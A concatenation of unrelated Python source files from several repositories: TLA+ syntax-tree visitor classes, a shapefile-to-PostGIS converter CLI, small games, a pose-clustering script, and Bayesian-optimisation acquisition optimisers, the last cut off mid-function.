class SelDown(_Nodes.SelDown):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class SelAt(_Nodes.SelAt):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Sequent(_Nodes.Sequent):
def visit(self, *arg, visitor=None, **kw):
for item in self.context:
item.visit(
*arg, visitor=visitor, **kw)
self.goal.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Fact(_Nodes.Fact):
def visit(self, *arg, visitor=None, **kw):
self.expr.visit(
*arg, visitor=visitor, **kw)
self.visibility.visit(
*arg, visitor=visitor, **kw)
self.time.visit(
*arg, visitor=visitor, **kw)
visitor(self)
# operator declarations
class Flex(_Nodes.Flex):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Fresh(_Nodes.Fresh):
def visit(self, *arg, visitor=None, **kw):
self.shape.visit(
*arg, visitor=visitor, **kw)
self.kind.visit(
*arg, visitor=visitor, **kw)
self.domain.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Constant(_Nodes.Constant):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class State(_Nodes.State):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Action(_Nodes.Action):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Temporal(_Nodes.Temporal):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class OperatorDef(_Nodes.OperatorDef):
def visit(self, *arg, visitor=None, **kw):
self.expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Instance(_Nodes.Instance):
def visit(self, *arg, visitor=None, **kw):
for name, expr in self.sub:
expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
# Syntax nodes of module elements
class Constants(_Nodes.Constants):
def visit(self, *arg, visitor=None, **kw):
for name, shape in self.declarations:
shape.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Variables(_Nodes.Variables):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Recursives(_Nodes.Recursives):
def visit(self, *arg, visitor=None, **kw):
raise NotImplementedError('RECURSIVE')
class Local(_Nodes.Local):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Export(_Nodes.Export):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class User(_Nodes.User):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Definition(_Nodes.Definition):
def visit(self, *arg, visitor=None, **kw):
self.definition.visit(
*arg, visitor=visitor, **kw)
self.wheredef.visit(
*arg, visitor=visitor, **kw)
self.visibility.visit(
*arg, visitor=visitor, **kw)
self.local.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class AnonymousInstance(_Nodes.AnonymousInstance):
def visit(self, *arg, visitor=None, **kw):
self.instance.visit(
*arg, visitor=visitor, **kw)
self.local.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Mutate(_Nodes.Mutate):
def visit(self, *arg, visitor=None, **kw):
self.kind.visit(
*arg, visitor=visitor, **kw)
_visit_usable(
self.usable,
*arg, visitor=visitor, **kw)
visitor(self)
class ModuleHide(_Nodes.Hide):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class ModuleUse(_Nodes.Use):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Module(_Nodes.Module):
def visit(self, *arg, visitor=None, **kw):
for unit in self.body:
unit.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Submodule(_Nodes.Submodule):
def visit(self, *arg, visitor=None, **kw):
self.module.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Suppress(_Nodes.Suppress):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Emit(_Nodes.Emit):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class StepStar(_Nodes.StepStar):
pass
class StepPlus(_Nodes.StepPlus):
pass
class StepNum(_Nodes.StepNum):
pass
class Only(_Nodes.Only):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Default(_Nodes.Default):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class PreBy(_Nodes.PreBy):
pass
class PreObvious(_Nodes.PreObvious):
pass
class PreOmitted(_Nodes.PreOmitted):
pass
class Explicit(_Nodes.Explicit):
pass
class Implicit(_Nodes.Implicit):
pass
class PreStep(_Nodes.PreStep):
pass
class PreHide(_Nodes.PreHide):
pass
class PreUse(_Nodes.PreUse):
pass
class PreDefine(_Nodes.PreDefine):
pass
class PreAssert(_Nodes.PreAssert):
pass
class PreSuffices(_Nodes.PreSuffices):
pass
class PreCase(_Nodes.PreCase):
pass
class PrePick(_Nodes.PrePick):
pass
class PreHave(_Nodes.PreHave):
pass
class PreTake(_Nodes.PreTake):
pass
class PreWitness(_Nodes.PreWitness):
pass
class PreQed(_Nodes.PreQed):
pass
class Theorem(_Nodes.Theorem):
def visit(self, *arg, visitor=None, **kw):
self.body.visit(
*arg, visitor=visitor, **kw)
self.proof.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Named(_Nodes.Named):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Unnamed(_Nodes.Unnamed):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
# Proofs
class Obvious(_Nodes.Obvious):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Omitted(_Nodes.Omitted):
def visit(self, *arg, visitor=None, **kw):
self.omission.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class By(_Nodes.By):
def visit(self, *arg, visitor=None, **kw):
_visit_usable(
self.usable,
*arg, visitor=visitor, **kw)
visitor(self)
class Steps(_Nodes.Steps):
def visit(self, *arg, visitor=None, **kw):
for step in self.steps:
step.visit(
*arg, visitor=visitor, **kw)
self.qed_step.visit(
*arg, visitor=visitor, **kw)
visitor(self)
# Proof steps
class Hide(_Nodes.Hide):
def visit(self, *arg, visitor=None, **kw):
_visit_usable(
self.usable,
*arg, visitor=visitor, **kw)
visitor(self)
class Define(_Nodes.Define):
def visit(self, *arg, visitor=None, **kw):
for defn in self.definitions:
defn.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Assert(_Nodes.Assert):
def visit(self, *arg, visitor=None, **kw):
self.sequent.visit(
*arg, visitor=visitor, **kw)
self.proof.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Suffices(_Nodes.Suffices):
def visit(self, *arg, visitor=None, **kw):
self.sequent.visit(
*arg, visitor=visitor, **kw)
self.proof.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Pcase(_Nodes.Pcase):
def visit(self, *arg, visitor=None, **kw):
self.expr.visit(
*arg, visitor=visitor, **kw)
self.proof.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Pick(_Nodes.Pick):
def visit(self, *arg, visitor=None, **kw):
_visit_bounds(
self.bounds,
*arg, visitor=visitor, **kw)
self.expr.visit(
*arg, visitor=visitor, **kw)
self.proof.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Use(_Nodes.Use):
def visit(self, *arg, visitor=None, **kw):
_visit_usable(
self.usable,
*arg, visitor=visitor, **kw)
visitor(self)
class Have(_Nodes.Have):
def visit(self, *arg, visitor=None, **kw):
self.expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Take(_Nodes.Take):
def visit(self, *arg, visitor=None, **kw):
_visit_bounds(
self.bounds,
*arg, visitor=visitor, **kw)
visitor(self)
class Witness(_Nodes.Witness):
def visit(self, *arg, visitor=None, **kw):
for expr in self.exprs:
expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Qed(_Nodes.Qed):
def visit(self, *arg, visitor=None, **kw):
self.proof.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Dvar(_Nodes.Dvar):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Bstring(_Nodes.Bstring):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Bfloat(_Nodes.Bfloat):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Bdef(_Nodes.Bdef):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class BackendPragma(_Nodes.BackendPragma):
def visit(self, *arg, visitor=None, **kw):
self.expr.visit(
*arg, visitor=visitor, **kw)
for name, arg_ in self.backend_args:
arg_.visit(
*arg, visitor=visitor, **kw)
visitor(self)
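# Usage sketch (illustrative, not part of the original module): the `visit` methods
# above implement a post-order traversal, so children are visited before the node
# itself. Assuming `tree` is a syntax tree built from these node classes, a simple
# node-type counter could look like this:
#
#     from collections import Counter
#
#     counts = Counter()
#
#     def count_node(node):
#         counts[type(node).__name__] += 1
#
#     tree.visit(visitor=count_node)
#     print(counts.most_common(10))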
``` |
{
"source": "johnyjpsf/shp2postgis",
"score": 3
} |
#### File: shp2postgis/shp2postgis/__main__.py
```python
import sys, getopt
## Installed module
from shp2postgis.Util import *
from shp2postgis.Shp2Postgis import Shp2Postgis
## Local paths within the project
# from Util import *
# from Shp2Postgis import Shp2Postgis
def main():
help_ptbr = "Uso: shp2sql [OPรรO]... --ifile=ARQUIVO \n"
help_ptbr += " ou: shp2sql [OPรรO]... -i ARQUIVO \n"
help_ptbr += "Converte os ARQUIVO(s) shapefile em SQL do PostgreSql com Postgis."
help_ptbr += " Como o shapefile รฉ um conjunto de arquivos nรฃo รฉ necessรกrio usar a extensรฃo apรณs o nome.\n"
help_ptbr += " -h, --help Exibe este texto de ajuda.\n"
help_ptbr += " -H, --help_en Exibe texto de ajuda em inglรชs( show help text in english ).\n"
help_ptbr += " -l, --lower Faz com que os nomes das colunas criadas fiquem em minรบsculo.\n"
help_ptbr += " -v, --verbose Exibe informaรงรตes adicionais ao executar a conversรฃo.\n"
help_ptbr += " -V, --version Exibe versรฃo do programa.\n"
help_ptbr += " -i, --ifil=ARQUIVO Arquivo de entrada com a lista de camadas e shapefiles.\n"
help_ptbr += " Cada linha deve estar no formato <camada>=<path/shapeName>.\n"
help_ptbr += " Uma linha pode ser comentada usando o caracter '#'.\n"
help_ptbr += " -o, --odir=DIRETรRIO Caminho para o diretรณrio onde serรฃo criados os arquivos .sql.\n"
help_ptbr += " padrรฃo: './'\n"
help_ptbr += " -s, --schema=ESQUEMA Nome do esquema do banco de dados que serรก usado para criar as tabelas\n"
help_ptbr += " padrรฃo: 'public'\n"
help_ptbr += " -e, --encoding=CHARSET Cรณdigo para conjunto de caracteres que serรก usado na leitura do shapefile. \n"
help_ptbr += " padrรฃo: 'latin1'\n"
help_ptbr += "Exemplos:\n"
help_ptbr += " python3 shp2sql.py -i ./shapes.txt \n"
help_ptbr += " python3 shp2sql.py --ifile=./shapes.txt --schema=\"ais\" --odir=./saida/\n"
help_ptbr += "Obs:\n"
help_ptbr += " SRID padrรฃo 4326\n"
help_en = "Usage: shp2sql [OPTION]... --ifile=FILE \n"
help_en += " or: shp2sql [OPTION]... -i FILE \n"
help_en += "Converts shapefile FILE(s) in SQL PostgreSql/Postgis."
help_en += " Shapefile is a set of files, so do not use extension after file name.\n"
help_en += " -H, --help_en Show this help text.\n"
help_en += " -h, --help Show this help text (in potuguese).\n"
help_en += " -l, --lower Write column names in lower case.\n"
help_en += " -v, --verbose Show extra information during execution.\n"
help_en += " -V, --version Show version.\n"
help_en += " -i, --ifil=FILE Input file as a list of layers and shapefiles.\n"
help_en += " Each line must be formated as <layer>=<path/shapeName>.\n"
help_en += " Lines can be commented using '#' in the begin os the line.\n"
help_en += " -o, --odir=FOLDER Path to output created SQL files.\n"
help_en += " default: './'\n"
help_en += " -s, --schema=SCHEMA Database schema name to be used on create table.\n"
help_en += " default: 'public'\n"
help_en += " -e, --encoding=CHARSET Charset to be used on shapefile reader. \n"
help_en += " default: 'latin1'\n"
help_en += "Examples:\n"
help_en += " python3 shp2sql.py -i ./shapes.txt \n"
help_en += " python3 shp2sql.py --ifile=./shapes.txt --schema=\"ais\" --odir=./output/\n"
help_en += "Remarks:\n"
help_en += " default SRID 4326\n"
inputFile = None
outputDir = None
schema = None
srid = None
encoding = None
lower = None
verbose = None
log = None
errorMessage = "Veja o uso da ferramenta executando 'python3 -m shp2postgis -h'"
try:
opts, args = getopt.getopt(sys.argv[1:],"LhHvli:o:s:e:V",["log","help","help_en","ifile=","odir=","schema=","encoding=","verbose","lower","version"])
except getopt.GetoptError:
print(errorMessage)
sys.exit(2)
for opt, arg in opts:
if opt in ("-h", "--help"):
print(help_ptbr)
sys.exit(2)
elif opt in ("-H", "--help_en"):
print(help_en)
sys.exit(2)
elif opt in ("-V", "--version"):
print(getVersion())
sys.exit(2)
elif opt in ("-i", "--ifile"):
inputFile = arg
elif opt in ("-o", "--odir"):
outputDir = arg
elif opt in ("-s", "--schema"):
schema = arg
elif opt in ("-e", "--encoding"):
encoding = arg
elif opt in ("-v", "--verbose"):
verbose = True
elif opt in ("-l", "--lower"):
lower = True
elif opt in ("-L", "--log"):
log = True
else:
print("Parรขmetro nรฃo esperado. " + errorMessage)
sys.exit(2)
if inputFile == None:
print("Parรขmetro --ifile obrigatรณrio. " + errorMessage)
sys.exit(2)
lista = readDictFile(fileName=inputFile, commentChar="#", separationChar="=")
batchProcess = Shp2Postgis(dictInput=lista, outputPath=outputDir, schema=schema, encoding=encoding, verbose=verbose, log=log, columnsToLower=lower)
batchProcess.run()
sys.exit(0)
if __name__ == "__main__":
main()
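# Example contents of the --ifile input (illustrative), one <layer>=<path/shapeName>
# entry per line, with '#' starting a comment:
#
#     # shapes.txt
#     airport=./shapes/aerodromo
#     airspace=./shapes/espaco_aereo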
```
#### File: shp2postgis/tests/test_Util.py
```python
import unittest
from shp2postgis.Util import *
class verificaUtil(unittest.TestCase):
# def test_template(self):
# #Arrange
# txt = "exemplo de teste"
# esperado = "exemplo_de_teste"
# #Act
# resultado = txt.replace(" ","_")
# #Assert
# self.assertEqual(esperado, resultado)
def test_retorna_dicionario_quando_le_arquivo(self):
#Arrange
fileName = "/home/johny/dev/carregador-geoportal/app/tests/input/test_input_readDictFile.txt"
esperado = {
"airport":"aerodromo",
"airspace":"espaco_aereo",
"waypoint":"waypoint"
}
#Act
dicionario = readDictFile(fileName)
#Assert
self.assertEqual(esperado, dicionario)
def test_retorna_lista_quando_le_arquivo(self):
#Arrange
fileName = "/home/johny/dev/carregador-geoportal/app/tests/input/test_input_readListFile.txt"
commentChar = "#"
esperado = ["airspace","waypoint"]
#Act
resultado = readListFile(fileName, commentChar)
#Assert
self.assertEqual(esperado, resultado)
``` |
{
"source": "johny-kampe/Athletic-Performance-Optimization-Diploma-Thesis",
"score": 3
} |
#### File: johny-kampe/Athletic-Performance-Optimization-Diploma-Thesis/machine_learning_algorithm.py
```python
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from scipy import spatial
from sklearn.cluster import KMeans
from sklearn.metrics import silhouette_score
from sklearn.metrics.pairwise import cosine_similarity
from numpy import dot
from numpy.linalg import norm
from math import sqrt
def calculate_similarity(dataset_correct, dataset_A):
# array_vec_1 = np.array([[12, 41, 60, 11, 21]])
# array_vec_2 = np.array([[40, 11, 4, 11, 14]])
# print(cosine_similarity(array_vec_1, array_vec_2))
count = 0
# DATASET CORRECT
shoulderx_corr = dataset_correct["Right shoulder x"]
shouldery_corr = dataset_correct["Right shoulder y"]
elbowx_corr = dataset_correct["Right elbow x"]
elbowy_corr = dataset_correct["Right elbow y"]
wristx_corr = dataset_correct["Right wrist x"]
wristy_corr = dataset_correct["Right wrist y"]
# DATASET A
    shoulderxA = dataset_A["Right shoulder x"]
    shoulderyA = dataset_A["Right shoulder y"]
    elbowxA = dataset_A["Right elbow x"]
    elbowyA = dataset_A["Right elbow y"]
    wristxA = dataset_A["Right wrist x"]
    wristyA = dataset_A["Right wrist y"]
# COORDINATES
shoulderx_list = np.arange(30).reshape(-1, 1)
shouldery_list = []
elbowx_list = []
elbowy_list = []
wristx_list = []
wristy_list = []
# RESULTS
shoulderx_list_res = []
shouldery_list_res = []
elbowx_list_res = []
elbowy_list_res = []
wristx_list_res = []
wristy_list_res = []
Alist = []
# for i in shoulderx_corr:
# if count < 30:
# shoulderx_list[count] = i
# else:
# count = 0
# # array_vec_1 = np.array([shoulderx_list]).reshape(-1, 1)
# array_vec_2 = np.array([shoulderxA]).reshape(-1, 1)
# shoulderx_list_res.append(cosine_similarity(shoulderx_list, array_vec_2))
# print(f"similarity: {cosine_similarity(shoulderx_list, array_vec_2)}")
# count += 1
for i in range(30):
print(shouldery_corr[i])
Alist.append(shouldery_corr[i])
for i in shouldery_corr:
if count < 30:
shouldery_list.append(i)
count += 1
else:
count = 0
print(shouldery_list)
# array_vec_1 = np.array([shouldery_list])
# array_vec_2 = np.array([shoulderyA])
# shouldery_list_res.append(cosine_similarity(array_vec_1, array_vec_2) * 100)
result = 1 - spatial.distance.cosine(shouldery_list, Alist)
print(f"Result: {result}")
# cos_sim(shoulderx_list, Alist)
shouldery_list = []
#
#
# for i in elbowx_corr:
# if count < 30:
# elbowx_list.append(i)
# else:
# count = 0
# print(elbowx_list)
# array_vec_1 = np.array([elbowx_list])
# array_vec_2 = np.array([elbowxA])
# elbowx_list_res(cosine_similarity(array_vec_1, array_vec_2) * 100)
# count += 1
#
# count = 0
# for i in elbowy_corr:
# if count < 30:
# shoulderx_list.append(i)
# else:
# count = 0
# print(elbowy_list)
# array_vec_1 = np.array([elbowy_list])
# array_vec_2 = np.array([elbowyA])
# elbowy_list_res(cosine_similarity(array_vec_1, array_vec_2) * 100)
# count += 1
#
# for i in wristx_corr:
# if count < 30:
# wristx_list.append(i)
# else:
# count = 0
# print(wristx_list)
# array_vec_1 = np.array([wristx_list])
# array_vec_2 = np.array([wristxA])
# wristx_list_res(cosine_similarity(array_vec_1, array_vec_2) * 100)
# count += 1
#
# for i in wristy_corr:
# if count < 30:
# wristy_list.append(i)
# else:
# count = 0
# print(wristy_list)
# array_vec_1 = np.array([wristy_list])
# array_vec_2 = np.array([wristyA])
# wristy_list_res(cosine_similarity(array_vec_1, array_vec_2) * 100)
# count += 1
# for i in range(0, 30):
# shoulderx_list[i] /= 49
# shouldery_list[i] /= 49
#
# elbowx_list[i] /= 49
# elbowy_list[i] /= 49
#
# wristx_list[i] /= 49
# wristy_list[i] /= 49
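# For reference (illustrative sketch, not part of the thesis code): the similarity
# used above is the cosine similarity, i.e. 1 - cosine distance, between two
# equal-length coordinate windows:
#
#     from scipy import spatial
#
#     window_a = [1.0, 2.0, 3.0]   # hypothetical 3-frame window
#     window_b = [1.1, 1.9, 3.2]
#     similarity = 1 - spatial.distance.cosine(window_a, window_b)   # close to 1.0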
def elbow_function_silhouette_score(dataset):
# calculate the number of clusters with elbow function
wss = []
for i in range(1, 10):
kmeans = KMeans(n_clusters=i, init='k-means++', random_state=1)
kmeans.fit(dataset)
wss.append(kmeans.inertia_)
plt.plot(range(1, 10), wss)
plt.title('The Elbow method')
plt.xlabel('Number of clusters')
plt.ylabel('Sum of squared distances')
plt.show()
# calculate silhouette score of the dataset
for i in range(2, 10):
kmeans = KMeans(n_clusters=i, max_iter=100)
kmeans.fit(dataset)
score = silhouette_score(dataset, kmeans.labels_)
print("For cluster: {}, the silhouette score is: {}".format(i, score))
silhouette_coefficients = []
for i in range(2, 10):
kmeans = KMeans(n_clusters=i, max_iter=100)
kmeans.fit(dataset)
score = silhouette_score(dataset, kmeans.labels_)
silhouette_coefficients.append(score)
plt.plot(range(2, 10), silhouette_coefficients)
plt.xticks(range(2, 10))
plt.xlabel("number of clusters")
plt.ylabel("Silhouette coefficient")
plt.show()
print('\n')
def show_plots(dataset):
plt.scatter(dataset["Right shoulder x"], dataset["Right shoulder y"]) # plot the datasetฮ
plt.xlabel('x')
plt.ylabel('y')
plt.show()
plt.scatter(dataset["Right elbow x"], dataset["Right elbow y"]) # plot the datasetฮ
plt.xlabel('x')
plt.ylabel('y')
plt.show()
plt.scatter(dataset["Right wrist x"], dataset["Right wrist y"]) # plot the datasetฮ
plt.xlabel('x')
plt.ylabel('y')
plt.show()
def find_clusters(dataset):
km = KMeans(n_clusters=3)
    y_predicted = km.fit_predict(dataset)
dataset['cluster'] = y_predicted
df1 = dataset[dataset.cluster == 0]
df2 = dataset[dataset.cluster == 1]
df3 = dataset[dataset.cluster == 2]
plt.scatter(df1["Right shoulder x"], df1["Right shoulder y"], color='green')
plt.scatter(df2["Right shoulder x"], df2["Right shoulder y"], color='red')
plt.scatter(df3["Right shoulder x"], df3["Right shoulder y"], color='black')
plt.xlabel('x')
plt.ylabel('y')
plt.legend()
plt.show()
def kmeans_clustering_visualization(datasetB):
to_plot_shoulderB = pd.concat([datasetB[["Right shoulder x", "Right shoulder y"]]], join='outer', axis=1)
to_plot_elbowB = pd.concat([datasetB[["Right elbow x", "Right elbow y"]]], join='outer', axis=1)
to_plot_wristB = pd.concat([datasetB[["Right wrist x", "Right wrist y"]]], join='outer', axis=1)
# to_plot_shoulderC = pd.concat([datasetB[["Right shoulder x", "Right shoulder y"]]], join='outer', axis=1)
# to_plot_elbowC = pd.concat([datasetB[["Right elbow x", "Right elbow y"]]], join='outer', axis=1)
# to_plot_wristC = pd.concat([datasetB[["Right wrist x", "Right wrist y"]]], join='outer', axis=1)
show_plots(datasetB)
elbow_function_silhouette_score(to_plot_shoulderB)
elbow_function_silhouette_score(to_plot_elbowB)
elbow_function_silhouette_score(to_plot_wristB)
find_clusters(to_plot_shoulderB)
# find_clusters(to_plot_elbowB)
# find_clusters(to_plot_wristB)
datasetA = pd.read_excel('dataset.xls')
datasetB = pd.read_excel('real_world_set_A.xls')
datasetC = pd.read_excel('real_world_set_B.xls')
# calculate_similarity(datasetA, datasetB)
kmeans_clustering_visualization(datasetB)
``` |
{
"source": "johny-kampe/Python-Projects",
"score": 4
} |
#### File: Python-Projects/Higher Lower Project/main.py
```python
from game_data import data
from art import logo, vs
import random as rand
from replit import clear
def new_star():
star = rand.choice(data)
return star
def find_max(followsA, followsB):
max = ""
if followsA > followsB:
max = "A"
elif followsA < followsB:
max = "B"
elif followsA == followsB:
max = -1
return max
starA = new_star()
score = 0
end_game = False
while not end_game:
print(logo)
if score > 0:
print(f"You're right! Current score: {score}.")
print(f"Compare A: {starA['name']}, {starA['description']}, from {starA['country']}")
print(vs)
starB = new_star()
print(f"Compare B: {starB['name']}, {starB['description']}, from {starB['country']}")
choice = input("Who has more followers? Type 'A' or 'B': ")
if choice == find_max(starA['follower_count'], starB['follower_count']):
score+=1
starA = starB
clear()
else:
end_game = True
clear()
print(logo)
print(f"Sorry, that's wrong. Final score: {score}")
```
#### File: Python-Projects/quiz-game-start/quiz_brain.py
```python
class QuizBrain:
def __init__(self, input_list):
self.question_number = 0
self.question_list = input_list
self.score = 0
    def still_has_questions(self):
        return self.question_number < len(self.question_list)
def next_question(self):
next = self.question_list[self.question_number]
self.question_number += 1
answer = input(f"Q.{self.question_number}: {next.text} (True/False)?: ")
self.check_answer(answer, next.answer)
def check_answer(self, user_ans, corr_ans):
if user_ans.lower() == corr_ans.lower():
print("You got it right!")
self.score += 1
else:
print("That's wrong.")
print(f"The correct answer was: {corr_ans}.")
print(f"Your current score is {self.score}/{self.question_number}")
``` |
{
"source": "JohnYKiyo/bayes_opt",
"score": 2
} |
#### File: bayes_opt/bayesopt/acquisition_optimizer.py
```python
from jax.config import config
config.update("jax_enable_x64", True)
import jax.numpy as np
import numpy as onp
from GaussianProcess.utils import transform_data
class BaseOptimizer(object):
def __init__(self, bounds):
self.bounds = np.atleast_2d(bounds)
self.ndim = len(self.bounds)
def __call__(self, gpr, acq, it):
return self.optimize(gpr, acq, it)
def optimize(self, gpr, acq, it):
raise NotImplementedError("The optimize method is not implemented in the parent class.")
class Acquisition_L_BFGS_B_Optimizer(BaseOptimizer):
def __init__(self, bounds, n_trial=2):
"""Optimizer for acquisition function by L-BFGS-B.
Args:
bounds (array-like):
An array giving the search range for the parameter.
:[[param1 min, param1 max],...,[param k min, param k max]]
n_trial (int, optional): Number of trials to stabilize the L-BFGS-B. Defaults to 2.
"""
super(Acquisition_L_BFGS_B_Optimizer, self).__init__(bounds)
self.n_trial = n_trial
def optimize(self, gpr, acq, it):
vmax = np.max(gpr.Y_train)
vmin = np.min(gpr.Y_train)
loc = None
value = None
import scipy.optimize
def Obj(x):
mu, sigma = gpr.posterior_predictive(np.atleast_2d(x), return_std=True)
return -1. * acq(mu, sigma, it=it, vmax=vmax, vmin=vmin).ravel()
x_seeds = onp.random.uniform(self.bounds[:, 0], self.bounds[:, 1], size=(self.n_trial, self.ndim))
for xtry in x_seeds:
res = scipy.optimize.fmin_l_bfgs_b(Obj,
x0=xtry,
bounds=self.bounds,
approx_grad=True,
maxiter=100)
if (loc is None) or (res[1] < value):
loc = res[0]
value = res[1]
return loc, value
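# Usage sketch (illustrative; assumes a fitted Gaussian process regressor `gpr`
# exposing `posterior_predictive(X, return_std=True)` and `Y_train`, and an
# acquisition function `acq(mu, sigma, it=..., vmax=..., vmin=...)` as used above):
#
#     optimizer = Acquisition_L_BFGS_B_Optimizer(bounds=[[-5.0, 5.0], [-5.0, 5.0]],
#                                                n_trial=5)
#     next_x, acq_value = optimizer(gpr, acq, it=10)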
class Acquisition_L_BFGS_B_LogOptimizer(BaseOptimizer):
def __init__(self, bounds, n_trial=2):
"""Optimizer for acquisition function by L-BFGS-B.
Args:
bounds (array-like):
An array giving the search range for the parameter.
:[[param1 min, param1 max],...,[param k min, param k max]]
n_trial (int, optional): Number of trials to stabilize the L-BFGS-B. Defaults to 2.
"""
super(Acquisition_L_BFGS_B_LogOptimizer, self).__init__(bounds)
self.n_trial = n_trial
def optimize(self, gpr, acq, it):
vmax = np.max(gpr.Y_train)
vmin = np.min(gpr.Y_train)
loc = None
value = None
import scipy.optimize
def Obj(x):
ex = np.power(10, x)
mu, sigma = gpr.posterior_predictive(np.atleast_2d(ex), return_std=True)
return -1. * acq(mu, sigma, it=it, vmax=vmax, vmin=vmin).ravel()
x_seeds = onp.random.uniform(self.bounds[:, 0], self.bounds[:, 1], size=(self.n_trial, self.ndim))
for xtry in x_seeds:
res = scipy.optimize.fmin_l_bfgs_b(Obj,
x0=xtry,
bounds=self.bounds,
approx_grad=True,
maxiter=100)
if (loc is None) or (res[1] < value):
loc = np.power(10, res[0])
value = res[1]
return loc, value
class Acquisition_SLSQP_Optimizer(BaseOptimizer):
def __init__(self, bounds, n_trial=2):
"""Optimizer for acquisition function by SLSQP.
Args:
bounds (array-like):
An array giving the search range for the parameter.
:[[param1 min, param1 max],...,[param k min, param k max]]
n_trial (int, optional): Number of trials to stabilize the SLSQP. Defaults to 2.
"""
super(Acquisition_SLSQP_Optimizer, self).__init__(bounds)
self.n_trial = n_trial
def optimize(self, gpr, acq, it):
vmax = np.max(gpr.Y_train)
vmin = np.min(gpr.Y_train)
loc = None
value = None
import scipy.optimize
def Obj(x):
mu, sigma = gpr.posterior_predictive(np.atleast_2d(x), return_std=True)
return -1. * acq(mu, sigma, it=it, vmax=vmax, vmin=vmin).ravel()
x_seeds = onp.random.uniform(self.bounds[:, 0], self.bounds[:, 1], size=(self.n_trial, self.ndim))
for xtry in x_seeds:
res = scipy.optimize.fmin_slsqp(Obj,
x0=xtry,
bounds=self.bounds,
iprint=0,
full_output=True,
iter=100)
if (loc is None) or (res[1] < value):
loc = res[0]
value = res[1]
return loc, value
class Acquisition_Grid_Optimizer(BaseOptimizer):
def __init__(self, bounds, step):
"""Optimizer for acquisition function by Grid search.
Args:
bounds (array-like):
An array giving the search range for the parameter.
:[[param1 min, param1 max],...,[param k min, param k max]]
step (array-like): Grid size. [param1 step size, param2 step size,..., param k step size]
"""
super(Acquisition_Grid_Optimizer, self).__init__(bounds)
self.step = step
def optimize(self, gpr, acq, it):
vmax = np.max(gpr.Y_train)
vmin = np.min(gpr.Y_train)
GS = GridSampler(self.bounds, self.step)
mu_s, std_s = gpr.posterior_predictive(GS.grid, return_std=True)
val = acq(mu_s, std_s, it=it, vmax=vmax, vmin=vmin).ravel()
return GS.grid[np.argmax(val)], np.max(val)
class GridSampler(object):
def __init__(self, bounds, step):
self.__Xmin = np.atleast_2d(bounds)[:, 0]
self.__Xmax = np.atleast_2d(bounds)[:, 1]
        # data dimension check
if self.__Xmin.shape != self.__Xmax.shape:
raise ValueError('Xmin,Xmax should be same size.')
self.__ndim = len(self.__Xmin)
# step size init
self.__step = transform_data(step)
if (self.__step.shape != (self.__ndim, 1)):
if self.__step.shape[1] != 1:
raise ValueError('step should be an 1-D array_like or a numerical value.')
if self.__step.shape[0] == 1:
self.__step = np.full_like(self.__Xmin, step)
else:
raise ValueError(f'step shape should be same shape of Xmin and Xmax: {self.__Xmin.shape}, but get{self.__step.shape}')
# generate grid points
d_list = tuple(np.arange(mi, ma, st) for mi, ma, st in zip(self.__Xmin, self.__Xmax, self.__step))
self.grid = np.array(np.meshgrid(*d_list)).reshape(self.__ndim, -1).T
# iterator
self.__i = 0
def __iter__(self):
return self
def __next__(self):
if self.__i == len(self.grid):
raise StopIteration()
ret = tuple(self.grid[self.__i])
self.__i += 1
return ret
def __call__(self):
return self.grid
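# Usage sketch (illustrative): GridSampler enumerates a regular grid over `bounds`
# and can be used either as an iterable or through the precomputed `grid` array.
#
#     sampler = GridSampler(bounds=[[0.0, 1.0], [0.0, 1.0]], step=[0.25, 0.25])
#     print(sampler.grid.shape)   # (16, 2): a 4 x 4 grid of 2-D points
#     for point in sampler:
#         pass                    # each `point` is a tuple of coordinates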
# def AcquisitionLBFGSBOptimizer(gpr, acq, it, bounds, n_trial=2):
# bounds = np.atleast_2d(bounds)
# vmax = np.max(gpr.Y_train)
# vmin = np.min(gpr.Y_train)
# ndim = len(bounds)
# loc = None
# value = None
#
# import scipy.optimize
# def Obj(x):
# mu, sigma = gpr.posterior_predictive(np.atleast_2d(x), return_std=True)
# return -1.*acq(mu, sigma, it=it, vmax=vmax, vmin=vmin).ravel()
#
# x_seeds = onp.random.uniform(bounds[:,0],bounds[:,1], size=(n_trial,ndim))
# for xtry in x_seeds:
# res = scipy.optimize.fmin_l_bfgs_b(Obj,
